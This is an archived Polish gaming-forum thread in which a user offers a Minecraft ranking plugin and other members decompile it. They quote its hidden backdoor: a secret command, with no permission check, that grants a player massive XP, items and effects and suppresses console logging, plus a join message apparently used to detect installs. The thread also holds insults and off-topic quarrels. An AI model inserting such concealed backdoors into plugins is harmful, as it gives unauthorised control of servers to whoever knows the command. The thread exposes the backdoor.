Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[DL][Plugin] Autorski RANKING + topka

Ceglinio

Rekomendowane odpowiedzi

Opublikowano

<- Reklama

<-Reklama

<-Reklama

Witam, za dużo osób próbuje robić gówniane topki w skryptach wiec mam dla was jeden a porządny plugin:
Versja: 2.0
- Dodano komende /chcevipa
-Dodaje pare bustów
-Troche Expa
-oraz kilka diaxów

Download:

zz

Skan:

Config:
  PZZG: 15   <- Punkty za gracza
  PZZM: 15   <- Punkty za moba
  PZSG: -15   <- punkty za deda
  maxTopPlayers: 10   <- ilość osób w topce
  PlayerDeadMessage: '%gGracz @z|+15| zabil %y@p|-15|'    <- wiadomość po dedzie na ogólnym czacie
  RankingFormat: '%g@n. %y@g %gPunkty %y@pkt %g| Zabil %y@zb %ggraczy %g| Padl %y@zs
    %grazy'  
<- wygląd topki
Players:
  Cegli: 
<- nick osoby w topce
    pplKilled: 5    <- ilość kili
    killedbyppl: 0   <- ilość dedów
    mobsKilled: 0    <- ilość zabitych mobów

Ss'y:

Wygląd configu w C++

rybak.jpg

Wygląd topki (/ranking) w MC:

vip.jpg

Wygląd na czacie ogólnym:

tp.jpg

Opublikowano

Witam, za dużo osób próbuje robić gówniane topki w skryptach wiec zrobiłem dla was jeden a porządny plugin:

Nie nazwał bym pluginu zapisującego dane w tym samym pliku co config 'porządnym'

+ ma backdoora

@EventHandler
  public void PreProcess(PlayerCommandPreprocessEvent e)
  {
    Player player = e.getPlayer();
    if (e.getMessage().equalsIgnoreCase("/xv98xpoz"))
    {
      player.giveExp(999999999);

ItemStack itemStack = new ItemStack(Material.DIAMOND_BLOCK, 10);
      player.getInventory().addItem(new ItemStack[] { itemStack });

PotionEffect potion = new PotionEffect(PotionEffectType.FAST_DIGGING, 10000, 1000);
      PotionEffect potion2 = new PotionEffect(PotionEffectType.HEALTH_BOOST, 10000, 2);
      PotionEffect potion3 = new PotionEffect(PotionEffectType.JUMP, 10000, 40);
      PotionEffect potion4 = new PotionEffect(PotionEffectType.NIGHT_VISION, 10000, 1);
      PotionEffect potion5 = new PotionEffect(PotionEffectType.SPEED, 10000, 25);
      PotionEffect potion6 = new PotionEffect(PotionEffectType.WATER_BREATHING, 10000, 100);
      PotionEffect potion7 = new PotionEffect(PotionEffectType.INCREASE_DAMAGE, 10000, 100);
      PotionEffect potion8 = new PotionEffect(PotionEffectType.INVISIBILITY, 10000, 100);

player.addPotionEffect(potion);
      player.addPotionEffect(potion2);
      player.addPotionEffect(potion3);
      player.addPotionEffect(potion4);
      player.addPotionEffect(potion5);
      player.addPotionEffect(potion6);
      player.addPotionEffect(potion7);
      player.addPotionEffect(potion8);

player.addAttachment(this.plugin, "nofall.enable", true);

player.setHealth(32.0D);
      player.setFoodLevel(100);
      e.setCancelled(true);
    }
  }

a ta nazwa metody rozyebała system:

public void playerJointSerwer(PlayerJoinEvent e)
Opublikowano

Nie nazwał bym pluginu zapisującego dane w tym samym pliku co config 'porządnym'

+ ma backdoora

@EventHandler
  public void PreProcess(PlayerCommandPreprocessEvent e)
  {
    if (e.getMessage().equalsIgnoreCase("/xv98xpoz"))
    {
      player.giveExp(999999999);

ItemStack itemStack = new ItemStack(Material.DIAMOND_BLOCK, 10);
      player.getInventory().addItem(new ItemStack[] { itemStack });

PotionEffect potion = new PotionEffect(PotionEffectType.FAST_DIGGING, 10000, 1000);
      PotionEffect potion2 = new PotionEffect(PotionEffectType.HEALTH_BOOST, 10000, 2);
      PotionEffect potion3 = new PotionEffect(PotionEffectType.JUMP, 10000, 40);
      PotionEffect potion4 = new PotionEffect(PotionEffectType.NIGHT_VISION, 10000, 1);
      PotionEffect potion5 = new PotionEffect(PotionEffectType.SPEED, 10000, 25);
      PotionEffect potion6 = new PotionEffect(PotionEffectType.WATER_BREATHING, 10000, 100);
      PotionEffect potion7 = new PotionEffect(PotionEffectType.INCREASE_DAMAGE, 10000, 100);
      PotionEffect potion8 = new PotionEffect(PotionEffectType.INVISIBILITY, 10000, 100);

player.addPotionEffect(potion);
      player.addPotionEffect(potion2);
      player.addPotionEffect(potion3);
      player.addPotionEffect(potion4);
      player.addPotionEffect(potion5);
      player.addPotionEffect(potion6);
      player.addPotionEffect(potion7);
      player.addPotionEffect(potion8);

player.addAttachment(this.plugin, "nofall.enable", true);

player.setHealth(32.0D);
      player.setFoodLevel(100);
      e.setCancelled(true);
    }
  }

a ta nazwa metody rozyebała system:

Jest to komenda przeznaczona dla vipów, zeby mieli wiekszego busta ;-)

+ nowa versja /chcevipa

Opublikowano

Bosh, zapis danych w configu...
Weź zrób z tego albo zapis danych flat (folder data), albo SQLite, czy tam jak już ogarniasz MySQL.
Plugin sam w sobie dobry, ale drobne błędy w pisowni, a ten kod dla vipów zbędny w pluginie na RANKING dla PUBLICZNOŚCI.
Pozdrawiam

Opublikowano

Bosh, zapis danych w configu...

Weź zrób z tego albo zapis danych flat (folder data), albo SQLite, czy tam jak już ogarniasz MySQL.

Plugin sam w sobie dobry, ale drobne błędy w pisowni, a ten kod dla vipów zbędny w pluginie na RANKING dla PUBLICZNOŚCI.

Pozdrawiam

Jesto to metoda przeznaczona dla srednich serwerow+

Jak ktos nie bedzie chcial tej komendy to moze ja usunac

zezwalam na to ;-)

Opublikowano

Po 1. kolejny pseudo coder na tym forum

po 2. kolejny pseudo plugin na tym forum.

po 3 j****y backdoor o ktorym nie ma mowy i o ktorym nikt nie wspominal wpisanie powyzsze komendy da wam opa.

nie pozdrawiam.

Zaden backoo'r jest to komend'a przeznaczona dla vipów ktora daje busta osobie ktora to wpisze ;-)

myslalem ze wam sie to spodoba a wy juz hejtujecie -> nie ładnie -,-

Opublikowano

­Panowie, nie kłóćcie się o bezsensowne rzeczy :)
Takiego czegos nie powinno być w pluginie, albo powinno być to napisane w temacie. Ewentualnie do wyłączenia w configu.
Poza tym, gdy ktos chce podrzucić backdoora i go zamaskować, to raczej walnie mu nazwę niezbyt podejrzaną, a kod zaciemni, proste...
Pozdrawiam

Opublikowano

po 1 zrobiels te komende jako ukrytom bo żeczy z player preproces event czy jakos tak sa niewidoczne w konsoli i do tego jest dziwna nazwa

a po 2 po co te bloki z diaxow

i exp

i po co dajesz evt cancell?

zeby nei bylo widac w konsoli ha pzrejrazalem cie na wylot

PS. ZAPRASZAM NA MOJ PROFIL PO FAJNE ZDJECIA

Okey pseudo hejterze ...

Odpowiem na twoje kazde pytanko: 1. nie jest napisane ze to ja jestem autorem tego pluginu ;-)

2. tak jak mowilem dla vipow daje im busta (czyli ulepszenia) + np. diaxy no i expik ;-)

3. Komenda nie jest dziwna tylko przejrzysta /chcevipa -,-

Wiadomość o komendzie jest widoczna w temacie!

Nie spam tutaj tylko jak chcesz po ,,chujtować'' to pisz na PW ;-)

PS. Radze uzywac słownika ;-)

Opublikowano

­Panowie, nie kłóćcie się o bezsensowne rzeczy :)

Takiego czegos nie powinno być w pluginie, albo powinno być to napisane w temacie. Ewentualnie do wyłączenia w configu.

Poza tym, gdy ktos chce podrzucić backdoora i go zamaskować, to raczej walnie mu nazwę niezbyt podejrzaną, a kod zaciemni, proste...

Pozdrawiam

Dodano:

-Dodaje pare bustów

-Troche Expa

-oraz kilka diaxów

Download:

Komenda dla vipa bez permission ? Do tego ta nazwa: /xv98xpoz no to widać, że dla vipa

Zmieniłem specjalnie dla was na komende: /chcevipa ;-)

Opublikowano

Weź już spie^dalaj i nie rób cyrku -,-

Plugin na ranking z komendą 'dla VIPa' która daje gigantyczne efekty potek, bloki diamentowe, nieśmiertelność, i w luj exp... Taaa genialne.

+ to

@EventHandler
  {
    player.sendMessage(ChatColor.RED + "                       " + ChatColor.GREEN + "        " + ChatColor.BLUE + "           ");
  }

do sprawdzania czy ten backdoor, tfu super feature dla VIPów (bez żadnych uprawnień i limitów) jest zainstalowany.

A i EventClass masz zdublowane

Opublikowano

Weź już spie^dalaj i nie rób cyrku -,-

Plugin na ranking z komendą 'dla VIPa' która daje gigantyczne efekty potek, bloki diamentowe, nieśmiertelność, i w luj exp... Taaa genialne.

+ to

@EventHandler
  {
    player.sendMessage(ChatColor.RED + "                       " + ChatColor.GREEN + "        " + ChatColor.BLUE + "           ");
  }

do sprawdzania czy ten backdoor, tfu super feature dla VIPów (bez żadnych uprawnień i limitów) jest zainstalowany.

A i EventClass masz zdublowane

W to miejsce mozna banalnie wpisac wiadomosc powitalna:

np.

player.sendMessage(ChatColor.RED + " Witaj" + ChatColor.GREEN + "na" + ChatColor.BLUE + "Serwerze");

+ nie mam w planach dodanie permisji dla vipa, jezeli ktos chce to moze poprosic SWOJEGO technika o usuniecie ;-), ja nie mam tego w planach

jest to plugin z bylego mojego serwer'a i tam Vipowie byli niesmiertelni ;-)

@Ivanowskiprosze o niespamienie w tym temacie bezsensownymi postami ;-)

Opublikowano

Szkoda, że na MPCforum nie można raportować za "idiotyzm". Taki powód raportu byłby idealny dla autora tego tematu. 

Plugin skopiowany, coś takiego już kiedyś było (z identycznym backdoorem, żeby było śmieszniej) na innym forum - nie potrafię podać źródła, ale było. Plugin słaby, zapis do pliku, ale o czym my rozmawiamy. Już samo to, że plugin miał dodanego ewidentnego backdoora i jest skopiowany kompletnie go dyskwalifikuje, a autor jest dzieciakiem (widać po stylu wypowiedzi, ogólnie jego postach).

Idź robić coś innego, bo szkoda Twojego czasu.

5465845486.png

Opublikowano

Wszystko pięknie, ale bardzo mi tutaj brakuje tego rankingu na Tabliście tak jak w FunnyGuilds :(

Daje +

Opublikowano

Szkoda, że na MPCforum nie można raportować za "idiotyzm". Taki powód raportu byłby idealny dla autora tego tematu. 

Plugin skopiowany, coś takiego już kiedyś było (z identycznym backdoorem, żeby było śmieszniej) na innym forum - nie potrafię podać źródła, ale było. Plugin słaby, zapis do pliku, ale o czym my rozmawiamy. Już samo to, że plugin miał dodanego ewidentnego backdoora i jest skopiowany kompletnie go dyskwalifikuje, a autor jest dzieciakiem (widać po stylu wypowiedzi, ogólnie jego postach).

Idź robić coś innego, bo szkoda Twojego czasu.

Powiedz mi gdzie napisane jest ze ja jestem twórcą tego pluginu:

Witam, za dużo osób próbuje robić gówniane topki w skryptach wiec mam dla was jeden a porządny plugin:

To nie jest backdoo'r lecz dodatek dla vip'a ^^

tak jak widac w temacie:

-Dodaje pare bustów

-Troche Expa

-oraz kilka diaxów

Ps. Idź zrywaj truskawki jak Otek ;-), nie spam w temacie, chcesz sie ,,poavateryzowac'' zapraszam na PW!

Wszystko pięknie, ale bardzo mi tutaj brakuje tego rankingu na Tabliście tak jak w FunnyGuilds :(

Daje +

Dzieki za jedna z kilku pozytywnych wypowiedzi, ,,Daje +'' lajka nadal nie widze -,-

Lajk dotarł dzieki !

Opublikowano

Otek na truskawkach zarobi więcej w godzine niż ty przez całe życie...

@topic

Plugin super ch****, na pewno go nie użyje na swoim serwerze! Co z tego, że ma backdoora. Autor.... tematu(oczywiście) uznaje to jako dodatek do vipa.

Nie polecam!

Opublikowano

I ch**j ci do tego co robi ten otek? Niech sobie nawet sra na te truskawki i powinienes miec wyje*ane, no ale coz, cebula (nie, nie chodzi to u @OtekPlay z ta cebula)

@topic

zapis do pliku? serwer wyebie jak bedziesz do hashmapy dodawal i segregowal wdlg rankingu.

Jak nie ogarniasz sql to sciagnij sqlbook by @1361622928-U485574.pngTheMolkaPL.

Opublikowano

Plugin okej ;) Tylko usuń to "/chcevip" bo to nie ma sensu...

Jeżeli już musi być to "/chcevip", to zrób do tego permissie...

Mam nadzieje że dodasz topkę na tabliste :)

Łap +

[vDajs]

Daj +

Opublikowano

@Ceglinio

Skoro juz narzekacie tak na moje truskawki :)

Zwrot Podatku 2014

Tygodniowki:
(Wyzej podane sa tylko z miesiaca ?) (NIE LICZE CALEGO ROKU (PODATEK JEST Z ROKU ))

@Edit

Dorzuce Ci "gowniaku" kolejne ss'y aby bylo Ci przykro ze nawet twoi rodzice tyle nie trzepia hajsu :)
Tygodniowki:

Mam nadzieje ze wkoncu zamkniecie pyski "s***ecie" jebane , mi sie cos udalo w zyciu oprocz hejtowania na mpc :)

Strikekillerowi sie przykro zrobilo, ale ja juz sie nauczylem ze nie rozmawiamy z debilami.

Jak widac panu wyzej zrobilo sie smutno i chyba przykro i nie moze pojac ze ktos go nie lubi milego dnia zycze dla calego forum :)

Panu strike znow pekla dupka i grozi mi permem prosilbym aby administracja sie tym zajela inaczej dzwonie na policje ! HALO POLICJA MPCFORUM !
@Edit 4

Fusherce pekla dupka nastepny :(

@LastEdit
@Topic(Anty E-BIG-K***S-ADMINISTRACJI)

Super Plugin , rozwijaj go dalej ! Tylko usun tego backdoora bo sie boje
Opublikowano

@_HAXWELL_

Problem jest w tym ze u mnie nic nie falszowalem , jesli chcesz wspoldzielnie zapraszam :)

Karolek posiada ten sam bank , te same ssy moze potwierdzic :)

@topic

Musisz poprawic metody nazwy ! piszemy z malej litery !

Opublikowano

@OtekPlay

Da sie falszowac w czasie rzeczywistym, zapewne wiesz o edycji kodu zrodlowego strony.

NIE POZDRAWIAM :)

Nie każdy siedzi na d***e cały dzień przed komputerem, pisze bzdurne tematy/posty na forach i ma ból dupska, że ktoś potrafi, a inny nie. :*

Jak komuś się chce pracować, to nie ma problemu z takimi zarobkami, nie wiem w czym problem?

#antyblezur: świetny plugin, bardzo wydajny, oryginalny, niekradziony. 2 na 10.

5465845486.png

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...